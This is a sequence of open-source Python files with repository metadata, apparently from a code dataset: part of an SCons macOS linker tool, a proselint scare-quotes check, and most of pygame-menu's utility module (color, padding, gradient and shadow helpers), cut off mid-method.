if env.get('APPLELINK_NO_COMPATIBILITY_VERSION', False):
return ""
elif env.get('APPLELINK_COMPATIBILITY_VERSION', False):
version_string = env['APPLELINK_COMPATIBILITY_VERSION']
elif env.get('SHLIBVERSION', False):
version_string = ".".join(env['SHLIBVERSION'].split('.')[:2] + ['0'])
else:
return ""
if version_string is None:
return ""
valid, reason = _applelib_check_valid_version(version_string)
if not valid:
raise AppleLinkInvalidCompatibilityVersionException(reason)
return "-Wl,-compatibility_version,%s" % version_string
def generate(env):
"""Add Builders and construction variables for applelink to an
Environment."""
link.generate(env)
env['FRAMEWORKPATHPREFIX'] = '-F'
env['_FRAMEWORKPATH'] = '${_concat(FRAMEWORKPATHPREFIX, FRAMEWORKPATH, "", __env__, RDirs)}'
env['_FRAMEWORKS'] = '${_concat("-framework ", FRAMEWORKS, "", __env__)}'
env['LINKCOM'] = env['LINKCOM'] + ' $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
env['SHLINKFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -dynamiclib')
env['SHLINKCOM'] = env['SHLINKCOM'] + ' $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
# see: http://docstore.mik.ua/orelly/unix3/mac/ch05_04.htm for proper naming
link._setup_versioned_lib_variables(env, tool = 'applelink')#, use_soname = use_soname)
env['LINKCALLBACKS'] = link._versioned_lib_callbacks()
env['LINKCALLBACKS']['VersionedShLibSuffix'] = _applelib_versioned_lib_suffix
env['LINKCALLBACKS']['VersionedShLibSoname'] = _applelib_versioned_shlib_soname
env['_APPLELINK_CURRENT_VERSION'] = _applelib_currentVersionFromSoVersion
env['_APPLELINK_COMPATIBILITY_VERSION'] = _applelib_compatVersionFromSoVersion
env['_SHLIBVERSIONFLAGS'] = '$_APPLELINK_CURRENT_VERSION $_APPLELINK_COMPATIBILITY_VERSION '
env['_LDMODULEVERSIONFLAGS'] = '$_APPLELINK_CURRENT_VERSION $_APPLELINK_COMPATIBILITY_VERSION '
# override the default for loadable modules, which are different
# on OS X than dynamic shared libs. echoing what XCode does for
# pre/suffixes:
env['LDMODULEPREFIX'] = ''
env['LDMODULESUFFIX'] = ''
env['LDMODULEFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -bundle')
env['LDMODULECOM'] = '$LDMODULE -o ${TARGET} $LDMODULEFLAGS $SOURCES $_LIBDIRFLAGS $_LIBFLAGS $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
env['__SHLIBVERSIONFLAGS'] = '${__libversionflags(__env__,"SHLIBVERSION","_SHLIBVERSIONFLAGS")}'
def exists(env):
return env['PLATFORM'] == 'darwin'
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
07a5c8b26b300f79a0570d6ca9e7a9d5b89f13df
|
de84a9c84e9fd00fb1cf52c69381b20c96463f2b
|
/proselint/checks/misc/scare_quotes.py
|
4c5fa8048d70efb9b3bfd66372ffb8fea9a4f650
|
[
"BSD-3-Clause"
] |
permissive
|
amperser/proselint
|
23b7b1a0963bf036dde9326b3bb0bbbfcdf26c61
|
b5b7536bec5fd461e45cacad87c2aab9ea33ac35
|
refs/heads/main
| 2023-08-11T08:45:59.641463
| 2023-07-27T13:28:58
| 2023-07-27T13:28:58
| 29,220,809
| 4,513
| 267
|
BSD-3-Clause
| 2023-09-10T20:53:11
| 2015-01-14T01:24:07
|
Python
|
UTF-8
|
Python
| false
| false
| 554
|
py
|
scare_quotes.py
|
"""Misuse of scare quotes.
---
layout: post
source: Pinker's book on writing
source_url: ???
title: misuse of scare quotes
date: 2014-06-10 12:31:19
categories: writing
---
Points out misuse of scare quotes.
"""
from proselint.tools import existence_check, memoize
@memoize
def check(text):
"""Suggest the preferred forms."""
err = "pinker.scare_quotes"
msg = "Misuse of 'scare quotes'. Delete them."
narcissism = [
"the 'take-home message'",
]
return existence_check(text, narcissism, err, msg)
|
aac1bd411cbdb2b37b60c8f8cfed2cc0b00e0aed
|
9da4adae4c389e84097a0da9bfce40f9132eef96
|
/pygame_menu/utils.py
|
c10c0ae245046d2bb22c8779c8b55193722af611
|
[
"MIT"
] |
permissive
|
ppizarror/pygame-menu
|
f8fd2ff3acefad25b07e19499a2dfebd50507403
|
bcfaccbb11d4a6ecba588eec2851932dc46c2337
|
refs/heads/master
| 2023-07-07T10:38:09.651797
| 2023-06-28T18:00:25
| 2023-06-28T18:00:25
| 89,940,842
| 570
| 207
|
NOASSERTION
| 2023-08-19T19:17:59
| 2017-05-01T16:26:50
|
Python
|
UTF-8
|
Python
| false
| false
| 39,971
|
py
|
utils.py
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
UTILS
Utility functions.
"""
__all__ = [
# Methods
'assert_alignment',
'assert_color',
'assert_cursor',
'assert_list_vector',
'assert_orientation',
'assert_position',
'assert_position_vector',
'assert_vector',
'check_key_pressed_valid',
'fill_gradient',
'format_color',
'get_cursor',
'get_finger_pos',
'load_pygame_image_file',
'make_surface',
'mouse_motion_current_mouse_position',
'parse_padding',
'print_menu_widget_structure',
'set_pygame_cursor',
'uuid4',
'warn',
'widget_terminal_title',
# Constants
'PYGAME_V2',
# Classes
'ShadowGenerator',
'TerminalColors'
]
import sys
import traceback
import uuid
import warnings
import pygame
import pygame_menu
from pygame_menu.locals import ALIGN_CENTER, ALIGN_LEFT, ALIGN_RIGHT, POSITION_CENTER, \
POSITION_NORTH, POSITION_SOUTH, POSITION_SOUTHEAST, POSITION_NORTHWEST, \
POSITION_WEST, POSITION_EAST, POSITION_NORTHEAST, POSITION_SOUTHWEST, \
ORIENTATION_HORIZONTAL, ORIENTATION_VERTICAL, FINGERDOWN, FINGERUP, FINGERMOTION
from pygame_menu._types import ColorType, ColorInputType, Union, List, Vector2NumberType, \
NumberType, Any, Optional, Tuple, NumberInstance, VectorInstance, PaddingInstance, \
PaddingType, Tuple4IntType, ColorInputInstance, VectorType, EventType, \
CursorInputInstance, CursorInputType, Tuple2IntType, Dict, Tuple3IntType
PYGAME_V2 = pygame.version.vernum[0] >= 2
WARNINGS_LAST_MESSAGES: Dict[int, bool] = {}
def assert_alignment(align: str) -> None:
"""
Assert that a certain alignment is valid.
:param align: Align value
"""
assert isinstance(align, str), f'alignment "{align}" must be a string'
assert align in (ALIGN_LEFT, ALIGN_CENTER, ALIGN_RIGHT), \
f'incorrect alignment value "{align}"'
def assert_color(
color: Union[ColorInputType, List[int]],
warn_if_invalid: bool = True
) -> ColorType:
"""
Assert that a certain color is valid.
:param color: Object color
:param warn_if_invalid: If ``True`` warns if the color is invalid
:return: Formatted color if valid, else, throws an ``AssertionError`` exception
"""
color = format_color(color, warn_if_invalid=warn_if_invalid)
assert isinstance(color, VectorInstance), \
f'color must be a tuple or list, not type "{type(color)}"'
assert 4 >= len(color) >= 3, \
'color must be a tuple or list of 3 or 4 numbers'
for i in range(3):
assert isinstance(color[i], int), \
f'"{color[i]}" in element color {color} must be an integer, not type "{type(color)}"'
assert 0 <= color[i] <= 255, \
f'"{color[i]}" in element color {color} must be an integer between 0 and 255'
if len(color) == 4:
assert isinstance(color[3], int), \
f'alpha channel must be an integer between 0 and 255, not type "{type(color)}"'
assert 0 <= color[3] <= 255, \
f'opacity of color {color} must be an integer between 0 and 255; ' \
f'where 0 is fully-transparent and 255 is fully-opaque'
return color
def assert_cursor(cursor: CursorInputType) -> None:
"""
Assert a given cursor is valid.
:param cursor: Cursor object
"""
assert isinstance(cursor, CursorInputInstance), \
'cursor instance invalid, it can be None, an integer, ' \
'or pygame.cursors.Cursor'
def assert_list_vector(list_vector: Union[List[Vector2NumberType], Tuple[Vector2NumberType, ...]],
length: int) -> None:
"""
Assert that a list fixed length vector is numeric.
:param list_vector: Numeric list vector
:param length: Length of the required vector. If ``0`` don't check the length
"""
assert isinstance(list_vector, VectorInstance), \
f'list_vector "{list_vector}" must be a tuple or list'
for v in list_vector:
assert_vector(v, length)
def assert_orientation(orientation: str) -> None:
"""
Assert that a certain widget orientation is valid.
:param orientation: Object orientation
"""
assert isinstance(orientation, str), \
f'orientation "{orientation}" must be a string'
assert orientation in (ORIENTATION_HORIZONTAL, ORIENTATION_VERTICAL), \
f'invalid orientation value "{orientation}"'
def assert_position(position: str) -> None:
"""
Assert that a certain position is valid.
:param position: Object position
"""
assert isinstance(position, str), \
f'position "{position}" must be a string'
assert position in (POSITION_WEST, POSITION_SOUTHWEST, POSITION_SOUTH,
POSITION_SOUTHEAST, POSITION_EAST, POSITION_NORTH,
POSITION_NORTHWEST, POSITION_NORTHEAST, POSITION_CENTER), \
f'invalid position value "{position}"'
def assert_position_vector(position: Union[str, List[str], Tuple[str, ...]]) -> None:
"""
Assert that a position vector is valid.
:param position: Object position
"""
if isinstance(position, str):
assert_position(position)
else:
assert isinstance(position, VectorInstance)
unique = []
for pos in position:
assert_position(pos)
if pos not in unique:
unique.append(pos)
assert len(unique) == len(position), 'there cannot be repeated positions'
def assert_vector(
num_vector: VectorType,
length: int,
instance: type = NumberInstance
) -> None:
"""
Assert that a fixed length vector is numeric.
:param num_vector: Numeric vector
:param length: Length of the required vector. If ``0`` don't check the length
:param instance: Instance of each item of the vector
"""
assert isinstance(num_vector, VectorInstance), \
f'vector "{num_vector}" must be a list or tuple of {length} items if type {instance}'
if length != 0:
assert len(num_vector) == length, \
f'vector "{num_vector}" must contain {length} numbers only, ' \
f'but {num_vector} were given'
for i in range(len(num_vector)):
num = num_vector[i]
if instance == int and isinstance(num, float) and int(num) == num:
num = int(num)
assert isinstance(num, instance), \
f'item {num} of vector must be {instance}, not type "{type(num)}"'
def check_key_pressed_valid(event: EventType) -> bool:
"""
Checks if the pressed key is valid.
:param event: Key press event
:return: ``True`` if a key is pressed
"""
# If the system detects that any key event has been pressed but
# there's not any key pressed then this method raises a KEYUP
# flag
bad_event = not (True in pygame.key.get_pressed())
if bad_event:
if 'test' in event.dict and event.dict['test']:
return True
ev = pygame.event.Event(pygame.KEYUP, {'key': event.key})
pygame.event.post(ev)
return not bad_event
def fill_gradient(
surface: 'pygame.Surface',
color: ColorInputType,
gradient: ColorInputType,
rect: Optional['pygame.Rect'] = None,
vertical: bool = True,
forward: bool = True
) -> None:
"""
Fill a surface with a gradient pattern.
:param surface: Surface to fill
:param color: Starting color
:param gradient: Final color
:param rect: Area to fill; default is surface's rect
:param vertical: True=vertical; False=horizontal
:param forward: True=forward; False=reverse
"""
if rect is None:
rect = surface.get_rect()
x1, x2 = rect.left, rect.right
y1, y2 = rect.top, rect.bottom
color = assert_color(color)
gradient = assert_color(gradient)
if vertical:
h = y2 - y1
else:
h = x2 - x1
if forward:
a, b = color, gradient
else:
b, a = color, gradient
rate = (
float(b[0] - a[0]) / h,
float(b[1] - a[1]) / h,
float(b[2] - a[2]) / h
)
fn_line = pygame.draw.line
if vertical:
for line in range(y1, y2):
color = (
min(max(a[0] + (rate[0] * (line - y1)), 0), 255),
min(max(a[1] + (rate[1] * (line - y1)), 0), 255),
min(max(a[2] + (rate[2] * (line - y1)), 0), 255)
)
fn_line(surface, color, (x1, line), (x2, line))
else:
for col in range(x1, x2):
color = (
min(max(a[0] + (rate[0] * (col - x1)), 0), 255),
min(max(a[1] + (rate[1] * (col - x1)), 0), 255),
min(max(a[2] + (rate[2] * (col - x1)), 0), 255)
)
fn_line(surface, color, (col, y1), (col, y2))
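# Illustrative usage sketch (not part of the original module; the surfaces and colors
# below are made up). Fills one surface with a vertical black-to-blue gradient and
# another with a horizontal red-to-yellow gradient:
#
#   background = make_surface(640, 480)
#   fill_gradient(background, (0, 0, 0), (30, 30, 120))
#   banner = make_surface(640, 60)
#   fill_gradient(banner, 'red', 'yellow', vertical=False)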
def format_color(
color: Union[ColorInputType, Any],
warn_if_invalid: bool = True
) -> Union[ColorType, Any]:
"""
Format color from string, int, or tuple to tuple type.
Available formats:
- Color name str: name of the color to use, e.g. ``"red"`` (all the supported name strings can be found in the colordict module, see https://github.com/pygame/pygame/blob/main/src_py/colordict.py)
- HTML color format str: ``"#rrggbbaa"`` or ``"#rrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided
- Hex number str: ``"0xrrggbbaa"`` or ``"0xrrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided
- int: int value of the color to use, using hex numbers can make this parameter more readable, e.g. ``0xrrggbbaa``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, note that the aa (alpha) value is not optional for the int format and must be provided
- tuple/list of int color values: ``(R, G, B, A)`` or ``(R, G, B)``, where R, G, B, and A are int values in the range of ``0`` to ``255`` inclusive, the A (alpha) value defaults to ``255`` (opaque) if not provided
:param color: Color to format. If format is valid returns the same input value
:param warn_if_invalid: If ``True`` warns if the color is invalid
:return: Color in (r, g, b, a) format
"""
if not isinstance(color, ColorInputInstance):
return color
if not isinstance(color, pygame.Color):
if isinstance(color, str):
if len(color) == 4 and color[0] == '#':
r, g, b = color[1], color[2], color[3]
color = f'#{r * 2}{g * 2}{b * 2}'
try:
if isinstance(color, VectorInstance) and 3 <= len(color) <= 4:
if PYGAME_V2:
for j in color:
if not isinstance(j, int):
raise ValueError('color cannot contain floating point values')
c = pygame.Color(*color)
else:
c = pygame.Color(color)
except ValueError:
if warn_if_invalid:
warn(f'invalid color value "{color}"')
else:
raise
return color
else:
c = color
return c.r, c.g, c.b, c.a
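# Illustrative sketch (not part of the original module): a few inputs accepted by
# format_color and the (r, g, b, a) tuples they are expected to map to.
def _demo_format_color():
    assert format_color('red') == (255, 0, 0, 255)          # color-name string
    assert format_color('#00ff00') == (0, 255, 0, 255)      # HTML hex, alpha defaults to 255
    assert format_color((0, 0, 255)) == (0, 0, 255, 255)    # 3-int tuple, alpha defaults to 255
    assert format_color((10, 20, 30, 40)) == (10, 20, 30, 40)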
def get_cursor() -> CursorInputType:
"""
Return the pygame cursor object.
:return: Cursor object
"""
try:
return pygame.mouse.get_cursor()
except TypeError as e:
warn(str(e))
return None
def get_finger_pos(menu: Optional['pygame_menu.Menu'], event: EventType) -> Tuple2IntType:
"""
Return the position from finger (or mouse) event on x-axis and y-axis (x, y).
:param menu: Menu object for relative positioning in finger events
:param event: Pygame event object
:return: Position on x-axis and y-axis (x, y) in px
"""
if event.type in (FINGERDOWN, FINGERMOTION, FINGERUP):
assert menu is not None, \
'menu reference cannot be none while using finger position'
display_size = menu.get_window_size()
finger_pos = (int(event.x * display_size[0]), int(event.y * display_size[1]))
return finger_pos
return event.pos
def is_callable(func: Any) -> bool:
"""
Return ``True`` if ``func`` is callable.
:param func: Function object
:return: ``True`` if function
"""
e = 'is_callable(func) method will be removed in v5, consider using built-in' \
' callable(func) method instead'
warnings.warn(e, DeprecationWarning)
return callable(func)
def load_pygame_image_file(image_path: str, **kwargs) -> 'pygame.Surface':
"""
Loads an image and returns a surface.
:param image_path: Image file
:param kwargs: Optional keyword arguments
:return: Surface
"""
# Try to load the image
try:
if 'test' in kwargs.keys():
raise pygame.error('File is not a Windows BMP file')
surface = pygame.image.load(image_path)
except pygame.error as exc:
# Check if file is not a Windows file
if str(exc) == 'File is not a Windows BMP file':
pil_invalid_exception = Exception
# Check if Pillow exists
try:
# noinspection PyPackageRequirements
from PIL import Image, UnidentifiedImageError
pil_invalid_exception = UnidentifiedImageError
img_pil = Image.open(image_path)
# noinspection PyTypeChecker
surface = pygame.image.fromstring(
img_pil.tobytes(), img_pil.size, img_pil.mode).convert()
except (ModuleNotFoundError, ImportError):
warn(f'Image file "{image_path}" could not be loaded, as pygame.error '
f'is raised. To avoid this issue install the Pillow library')
raise
except pil_invalid_exception:
warn(f'The image "{image_path}" could not be loaded using Pillow')
raise
else:
raise
return surface
def make_surface(
width: NumberType,
height: NumberType,
alpha: bool = False,
fill_color: Optional[ColorInputType] = None
) -> 'pygame.Surface':
"""
Creates a pygame surface object.
:param width: Surface width
:param height: Surface height
:param alpha: Enable alpha channel on surface
:param fill_color: Fill surface with a certain color
:return: Pygame surface
"""
assert isinstance(width, NumberInstance)
assert isinstance(height, NumberInstance)
assert isinstance(alpha, bool)
assert width >= 0 and height >= 0, \
'surface width and height must be equal or greater than zero'
surface = pygame.Surface((int(width), int(height)), pygame.SRCALPHA, 32)
if alpha:
# noinspection PyArgumentList
surface = pygame.Surface.convert_alpha(surface)
if fill_color is not None:
fill_color = assert_color(fill_color)
surface.fill(fill_color)
return surface
def mouse_motion_current_mouse_position() -> EventType:
"""
Return a pygame event type MOUSEMOTION in the current mouse position.
:return: Event
"""
x, y = pygame.mouse.get_pos()
return pygame.event.Event(pygame.MOUSEMOTION, {'pos': (int(x), int(y))})
def parse_padding(padding: PaddingType) -> Tuple4IntType:
"""
Get the padding value from tuple.
- If an integer or float is provided: top, right, bottom and left values will be the same
- If 2-item tuple is provided: top and bottom takes the first value, left and right the second
- If 3-item tuple is provided: top will take the first value, left and right the second, and bottom the third
- If 4-item tuple is provided: padding will be (top, right, bottom, left)
.. note::
See `CSS W3Schools <https://www.w3schools.com/css/css_padding.asp>`_ for more info about padding.
:param padding: Can be a single number, or a tuple of 2, 3 or 4 elements following CSS style
:return: Padding value, (top, right, bottom, left), in px
"""
    if padding is False or padding is None:
padding = 0
assert isinstance(padding, PaddingInstance)
if isinstance(padding, NumberInstance):
assert padding >= 0, 'padding cannot be a negative number'
return int(padding), int(padding), int(padding), int(padding)
else:
assert 1 <= len(padding) <= 4, 'padding must be a tuple of 2, 3 or 4 elements'
for i in range(len(padding)):
assert isinstance(padding[i], NumberInstance), \
'all padding elements must be integers or floats'
assert padding[i] >= 0, \
'all padding elements must be equal or greater than zero'
if len(padding) == 1:
return int(padding[0]), int(padding[0]), int(padding[0]), int(padding[0])
elif len(padding) == 2:
return int(padding[0]), int(padding[1]), int(padding[0]), int(padding[1])
elif len(padding) == 3:
return int(padding[0]), int(padding[1]), int(padding[2]), int(padding[1])
else:
return int(padding[0]), int(padding[1]), int(padding[2]), int(padding[3])
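# Illustrative sketch (not part of the original module): the CSS-style expansion
# performed by parse_padding, always returned as (top, right, bottom, left).
def _demo_parse_padding():
    assert parse_padding(5) == (5, 5, 5, 5)
    assert parse_padding((5, 10)) == (5, 10, 5, 10)        # (top/bottom, left/right)
    assert parse_padding((5, 10, 15)) == (5, 10, 15, 10)   # (top, left/right, bottom)
    assert parse_padding((5, 10, 15, 20)) == (5, 10, 15, 20)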
def print_menu_widget_structure(
widgets: List['pygame_menu.widgets.Widget'],
index: int
) -> None:
"""
Test printing widgets order.
.. note::
- Φ Floating status
- ⇇ Selected
- !▲ Widget is not appended to current menu
- ╳ Widget is hidden
- ∑ Scrollable frame sizing
- β Widget is not selectable
- {x,y} Widget *column, row* position
- <x,y> Frame indices (min, max)
:param widgets: Menu widgets list
:param index: Menu index
"""
indx = 0
current_depth = 0
depth_widths = {}
c = TerminalColors
def close_frames(depth: int) -> None:
"""
Close frames up to current depth.
:param depth: Depth to close
"""
d = current_depth - depth
for i in range(d):
j = depth + d - (i + 1) # Current depth
line = f'· {"│ " * j}└{"┄" * 3}' # * depth_widths[j]
print(c.BRIGHT_WHITE + line.ljust(0, '━') + c.ENDC) # 80 also work
non_menu_frame_widgets: Dict[int, List['pygame_menu.widgets.Widget']] = {}
def process_non_menu_frame(w_indx: int) -> None:
"""
Print non-menu frames list.
:param w_indx: Current iteration index to print widgets
"""
for nmi in list(non_menu_frame_widgets.keys()):
if nmi == w_indx:
v = non_menu_frame_widgets[nmi]
for v_wid in v:
try:
print(c.BRIGHT_WHITE + '· ' + '│ ' * v_wid.get_frame_depth()
+ c.ENDC + widget_terminal_title(v_wid))
except UnicodeEncodeError:
pass
del non_menu_frame_widgets[nmi]
for w in widgets:
w_depth = w.get_frame_depth()
close_frames(w.get_frame_depth())
title = widget_terminal_title(w, indx, index)
try:
print('{0}{1}{2}'.format(
str(indx).ljust(3),
' ' + c.BRIGHT_WHITE + '│ ' * w_depth + c.ENDC,
title
))
except UnicodeEncodeError:
pass
if w_depth not in depth_widths.keys():
depth_widths[w_depth] = 0
# depth_widths[w_depth] = max(int(len(title) * 1.2) + 3, depth_widths[w_depth])
depth_widths[w_depth] = len(title) - 2
current_depth = w.get_frame_depth()
process_non_menu_frame(indx)
jw = widgets[0]
try:
if isinstance(w, pygame_menu.widgets.Frame): # Print ordered non-menu widgets
current_depth += 1
prev_indx = indx
for jw in w.get_widgets(unpack_subframes=False):
if jw.get_menu() is None or jw not in widgets:
if prev_indx not in non_menu_frame_widgets.keys():
non_menu_frame_widgets[prev_indx] = []
non_menu_frame_widgets[prev_indx].append(jw)
else:
prev_indx = widgets.index(jw)
except ValueError as e:
print(f'[ERROR] while requesting widget {jw.get_class_id()}')
warn(str(e))
indx += 1
process_non_menu_frame(indx)
close_frames(0)
def set_pygame_cursor(cursor: CursorInputType) -> None:
"""
Set pygame cursor.
:param cursor: Cursor object
"""
try:
if cursor is not None:
# noinspection PyArgumentList
pygame.mouse.set_cursor(cursor)
except (pygame.error, TypeError):
if PYGAME_V2:
warn(f'could not establish widget cursor, invalid value {cursor}')
def uuid4(short: bool = False) -> str:
"""
Create custom version of uuid4.
:param short: If ``True`` only returns the first 8 chars of the uuid, else, 18
:return: UUID of 18 chars
"""
return str(uuid.uuid4())[:18 if not short else 8]
def warn(message: str, print_stack: bool = True) -> None:
"""
Warnings warn method.
:param message: Message to warn about
:param print_stack: Print stack trace of the call
"""
assert isinstance(message, str)
# noinspection PyUnresolvedReferences,PyProtectedMember
frame = sys._getframe().f_back
# frame_info = inspect.getframeinfo(frame) # Traceback(filename, lineno, function, code_context, index)
# Check if message in dict
msg_hash = hash(message)
msg_in_hash = False
try:
msg_in_hash = WARNINGS_LAST_MESSAGES[msg_hash]
except KeyError:
pass
if not msg_in_hash and print_stack:
traceback.print_stack(frame, limit=5)
WARNINGS_LAST_MESSAGES[msg_hash] = True
# warnings.showwarning(message, UserWarning, frame_info[0], frame_info[1])
warnings.warn(message, stacklevel=2)
def widget_terminal_title(
widget: 'pygame_menu.widgets.Widget',
widget_index: int = -1,
current_index: int = -1
) -> str:
"""
Return widget title to be printed on terminals.
:param widget: Widget to get title from
:param widget_index: Widget index
:param current_index: Menu index
:return: Widget title
"""
w_class_id = TerminalColors.BOLD + widget.get_class_id() + TerminalColors.ENDC
if isinstance(widget, pygame_menu.widgets.Frame):
w_title = TerminalColors.BRIGHT_WHITE + '┌━' + TerminalColors.ENDC
        w_title += '{0} - {3}[{1},{2},'.format(w_class_id, *widget.get_indices(), TerminalColors.LGREEN)
if widget.horizontal:
w_title += 'H] '
else:
w_title += 'V] '
if widget.is_scrollable:
wsz = widget.get_inner_size()
wsm = widget.get_max_size()
wsh = wsm[0] if wsm[0] == wsz[0] else f'{wsm[0]}→{wsz[0]}'
wsv = wsm[1] if wsm[1] == wsz[1] else f'{wsm[1]}→{wsz[1]}'
w_title += f'∑ [{wsh},{wsv}] '
w_title += TerminalColors.ENDC
else:
if widget.get_title() != '':
title_f = TerminalColors.UNDERLINE + widget.get_title() + TerminalColors.ENDC
w_title = f'{w_class_id} - {title_f} - '
else:
w_title = w_class_id + ' - '
# Column/Row position
w_title += TerminalColors.INDIGO
cr = widget.get_col_row_index()
w_title += '{' + str(cr[0]) + ',' + str(cr[1]) + '}'
w_title += TerminalColors.ENDC
# Add position
w_title += TerminalColors.MAGENTA
w_title += ' ({0},{1})'.format(*widget.get_position())
w_title += TerminalColors.ENDC
# Add size
w_title += TerminalColors.BLUE
w_title += ' ({0},{1})'.format(*widget.get_size())
w_title += TerminalColors.ENDC
# Add mods
w_title += TerminalColors.CYAN
if widget.is_floating():
w_title += ' Φ'
if not widget.is_visible():
w_title += ' ╳'
if not widget.is_selectable:
w_title += ' β'
if widget.is_selected():
w_title += TerminalColors.BOLD + ' ⟵'
if current_index != -1 and current_index != widget_index:
w_title += f'! [{widget_index}->{current_index}]'
if widget.get_menu() is None:
w_title += ' !▲'
w_title += TerminalColors.ENDC
return w_title
class TerminalColors(object):
"""
Terminal colors.
See https://www.lihaoyi.com/post/BuildyourownCommandLinewithANSIescapecodes.html.
"""
BLUE = '\u001b[38;5;27m'
BOLD = '\033[1m'
BRIGHT_MAGENTA = '\u001b[35;1m'
BRIGHT_WHITE = '\u001b[37;1m'
CYAN = '\u001b[36m'
ENDC = '\u001b[0m'
GRAY = '\u001b[30;1m'
INDIGO = '\u001b[38;5;129m'
LGREEN = '\u001b[38;5;150m'
MAGENTA = '\u001b[35m'
RED = '\u001b[31m'
UNDERLINE = '\033[4m'
class ShadowGenerator(object):
"""
    A class to generate surfaces that work as a 'shadow' for rectangular UI elements. Base shadow
    surfaces are generated with an algorithm; when one is requested at a specific size, the
    closest pre-generated shadow surface is picked and scaled to the exact size requested.
    By default, it creates four base shadows in a small range of sizes. If you find the shadow
    appearance unsatisfactory then it is possible to create base shadows closer to the size of
    the elements you are having trouble with.
Source: https://github.com/MyreMylar/pygame_gui with many edits.
"""
_created_ellipse_shadows: Dict[str, 'pygame.Surface']
_preloaded_shadow_corners: Dict[str, Dict[str, 'pygame.Surface']]
_short_term_rect_cache: Dict[str, 'pygame.Surface']
def __init__(self) -> None:
self._created_ellipse_shadows = {}
self._preloaded_shadow_corners = {}
self._short_term_rect_cache = {}
def clear_short_term_caches(self, force: bool = False) -> None:
"""
Empties short term caches, so we aren't hanging on to so many surfaces.
:param force: Force clear
"""
t = len(self._created_ellipse_shadows) + len(self._preloaded_shadow_corners) + \
len(self._short_term_rect_cache)
if t >= 100 or force:
self._created_ellipse_shadows.clear()
self._preloaded_shadow_corners.clear()
self._short_term_rect_cache.clear()
def _create_shadow_corners(
self,
shadow_width_param: int,
corner_radius_param: int,
color: Tuple3IntType,
aa_amount: int = 4
) -> Dict[str, 'pygame.Surface']:
"""
Create corners for our rectangular shadows. These can be used across many
sizes of shadow with the same shadow width and corner radius.
:param shadow_width_param: Width of the shadow
:param corner_radius_param: Corner radius of the shadow
:param color: Shadow color
:param aa_amount: Anti-aliasing amount. Defaults to 4x
:return: Dict that contain the shadows of each border
"""
shadow_width_param = max(1, shadow_width_param)
corner_rect = pygame.Rect(
0, 0,
corner_radius_param * aa_amount,
corner_radius_param * aa_amount
)
corner_surface, edge_surface = self._create_single_corner_and_edge(
aa_amount=aa_amount,
corner_radius_param=corner_radius_param,
corner_rect=corner_rect,
shadow_width_param=shadow_width_param,
color=color
)
sub_radius = ((corner_radius_param - shadow_width_param) * aa_amount)
top_edge = pygame.transform.smoothscale(edge_surface,
(shadow_width_param, shadow_width_param))
left_edge = pygame.transform.rotate(top_edge, 90)
tl_corner = pygame.transform.smoothscale(corner_surface,
(corner_radius_param,
corner_radius_param))
if sub_radius > 0:
corner_sub_surface = pygame.surface.Surface(corner_rect.size,
flags=pygame.SRCALPHA,
depth=32)
corner_sub_surface.fill(pygame.Color('#00000000'))
pygame.draw.circle(corner_sub_surface,
pygame.Color('#FFFFFFFF'),
corner_rect.size,
sub_radius)
corner_small_sub_surface = pygame.transform.smoothscale(corner_sub_surface,
(corner_radius_param,
corner_radius_param))
tl_corner.blit(corner_small_sub_surface,
(0, 0),
special_flags=pygame.BLEND_RGBA_SUB)
corners_and_edges = {
'bottom': pygame.transform.flip(top_edge, False, True),
'bottom_left': pygame.transform.flip(tl_corner, False, True),
'bottom_right': pygame.transform.flip(tl_corner, True, True),
'left': left_edge,
'right': pygame.transform.flip(left_edge, True, False),
'top': top_edge,
'top_left': tl_corner,
'top_right': pygame.transform.flip(tl_corner, True, False)
}
self._preloaded_shadow_corners[(str(shadow_width_param) +
'x' +
str(corner_radius_param))] = corners_and_edges
return corners_and_edges
@staticmethod
def _create_single_corner_and_edge(
aa_amount: int,
corner_radius_param: int,
corner_rect: 'pygame.Rect',
shadow_width_param: int,
color: Tuple3IntType
) -> Tuple['pygame.Surface', 'pygame.Surface']:
"""
Creates a single corner surface and a single edge surface for a shadow.
:param aa_amount: Amount of anti-aliasing
:param corner_radius_param: Radius of a corner this shadow will go around
:param corner_rect: Rectangular size of corner
:param shadow_width_param: Width of shadow
:param color: Shadow color
:return: A tuple of the corner surface and the edge surface
"""
aa_amount = max(1, aa_amount)
final_corner_surface = pygame.surface.Surface((corner_radius_param * aa_amount,
corner_radius_param * aa_amount),
flags=pygame.SRCALPHA, depth=32)
final_corner_surface.fill(pygame.Color('#00000000'))
final_edge_surface = pygame.surface.Surface((shadow_width_param * aa_amount,
shadow_width_param * aa_amount),
flags=pygame.SRCALPHA, depth=32)
final_edge_surface.fill(pygame.Color('#00000000'))
corner_radius = corner_radius_param * aa_amount
corner_centre = (corner_radius, corner_radius)
edge_rect = pygame.Rect(0, 0,
shadow_width_param * aa_amount,
shadow_width_param * aa_amount)
edge_shadow_fade_height = edge_rect.width
alpha_increment = 20.0 / (shadow_width_param ** 1.5)
shadow_alpha = alpha_increment
r, g, b = color
for _ in range(shadow_width_param):
if corner_rect.width > 0 and corner_rect.height > 0 and corner_radius > 0:
# Edge
edge_shadow_surface = pygame.surface.Surface(
edge_rect.size,
flags=pygame.SRCALPHA,
depth=32)
edge_shadow_surface.fill(pygame.Color('#00000000'))
edge_shadow_surface.fill(pygame.Color(r, g, b, int(shadow_alpha)),
pygame.Rect(0,
edge_rect.height - edge_shadow_fade_height,
edge_rect.width,
edge_shadow_fade_height))
final_edge_surface.blit(edge_shadow_surface,
(0, 0),
special_flags=pygame.BLEND_RGBA_ADD)
# Corner
corner_shadow_surface = pygame.surface.Surface(corner_rect.size,
flags=pygame.SRCALPHA,
depth=32)
